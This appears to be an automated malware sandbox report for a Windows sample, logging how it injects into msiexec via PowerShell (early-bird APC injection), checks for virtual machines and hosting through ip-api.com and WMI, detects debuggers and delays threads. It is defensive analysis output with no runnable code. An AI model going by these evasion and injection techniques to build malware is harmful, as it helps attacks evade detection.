Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599734	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599625	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599515	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599294	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599116	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598157	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598032	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597907	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597782	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595262	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594811	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594358	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594141	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594019	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593898	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593782	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593657	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593532	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7347			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2408			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4496	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 636	Thread sleep count: 2661 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -599860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 636	Thread sleep count: 7167 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -599734s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -599625s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -599515s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -599406s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -599294s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -599116s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -598641s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -598375s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -598266s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -598157s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -598032s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -597907s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -597782s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -99890s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -99781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -99671s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -99562s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -99453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -99343s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -99234s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -99125s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -99015s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -98906s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -98796s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -98687s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -98578s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -98468s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -98359s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -98249s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -98140s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -98031s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -97921s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -97812s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -97703s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -595375s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -595262s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -595156s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -595047s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -594811s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -594594s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -594469s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -594358s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -594250s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -594141s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -594019s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -593898s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -593782s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -593657s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100	Thread sleep time: -593532s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Code function: 0_2_00402862 FindFirstFileW,	0_2_00402862
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Code function: 0_2_004066F3 FindFirstFileW,FindClose,	0_2_004066F3
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Code function: 0_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405ABE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599734	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599625	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599515	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599294	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599116	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598157	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598032	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597907	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597782	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99671	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99343	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99125	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99015	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98796	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98249	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 97921	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 97812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 97703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595262	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594811	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594358	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594141	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594019	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593898	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593782	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593657	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593532	Jump to behavior

Source: msiexec.exe, 00000005.00000002.2665422405.0000000009947000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2665422405.00000000098EA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\REnBTVfW8q.exe

API call chain: ExitProcess graph end node

graph_0-3563

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 5_2_00C77EC0 CheckRemoteDebuggerPresent,

5_2_00C77EC0

Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_0501DFE0 LdrInitializeThunk,

2_2_0501DFE0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4020000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
